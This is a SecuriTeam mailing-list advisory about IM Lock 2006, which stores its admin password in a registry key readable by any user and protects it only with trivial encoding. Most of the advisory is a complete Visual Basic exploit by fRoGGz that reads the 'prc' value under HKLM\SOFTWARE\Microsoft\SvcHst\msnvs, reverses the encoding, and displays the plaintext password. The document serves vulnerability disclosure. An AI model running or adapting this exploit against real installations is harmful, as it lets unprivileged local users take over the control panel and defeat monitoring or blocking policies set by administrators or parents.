[EXPL] IM Lock Insecure Registry Permission (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



IM Lock Insecure Registry Permission (Exploit)
------------------------------------------------------------------------


SUMMARY

Security Auditing & Management software, IM Lock controls and blocks
access to Instant Messaging and peer to peer services that can infect
computers with viruses.

An encrypted password is stored in the registry, this key is readable by
non-privileged users on the system, so by decoding the password, a
malicious user could gain access to the config panel.

DETAILS

Exploit:

############################################################################
' IM Lock 2006 - Local Password Encryption Weakness Exploit by fRoGGz
' Versions: Home Edition, Enterprise & Professional
' Application: IM Lock 2006
' Distributor : Comvigo, Inc.
' Link: http://www.comvigo.com
' Vulnerable Description: IM Lock 2006 discloses passwords to local users.
'
' Discovered & Coded by fRoGGz
' Credits to: SecuBox Labs - shadock.secubox.com
'
'
############################################################################

Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As
Long) As Long

Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA"
_
(ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As
Long

Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias
"RegQueryValueExA" _
(ByVal hKey As Long, _
ByVal lpValueName As String, _
ByVal lpReserved As Long, _
lpType As Long, _
lpData As Any, _
lpcbData As Long) As Long

Dim i As Integer
Dim GetCrypt, Decrypt As String

Public Function GrabBDR(hKey As Long, strPath As String, strValue As
String) As String
Dim keyhand As Long
Dim lResult As Long
Dim strBuf As String
Dim lDataBufSize As Long
Dim intZeroPos As Integer
Dim sBuffer As String

r = RegOpenKey(hKey, strPath, keyhand)
lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&,
lDataBufSize)

If lValueType = 1 Then
strBuf = String(lDataBufSize, " ")
lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal
strBuf, lDataBufSize)
If lResult = ERROR_SUCCESS Then
intZeroPos = InStr(strBuf, Chr$(0))
If intZeroPos > 0 Then
GrabBDR = Left$(strBuf, intZeroPos - 1)
End If
End If
lResult = RegCloseKey(hKey)
End If
End Function

Private Sub Form_Load()
GetCrypt = GrabBDR(&H80000002, "SOFTWARE\Microsoft\SvcHst\msnvs",
"prc")
If GetCrypt <> "" Then
For i = 1 To Len(GetCrypt)
Decrypt = Decrypt & Chr(255 - Asc(Mid(GetCrypt, i, 1)))
Next
MsgBox "ENCRYPT PASSWORD FOUND !" & vbCrLf & "YOUR PASSWORD IS: "
& Decrypt, _
vbOKOnly, "Secubox Labs - Recovery"
Else
MsgBox "NO ENCRYPT PASSWORD FOUND !", vbCritical, "IM LOCK
INSTALLED ?"
End If
End
End Sub


ADDITIONAL INFORMATION

The information has been provided by <mailto:unsecure@xxxxxxxxxxx>
fRoGGz.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages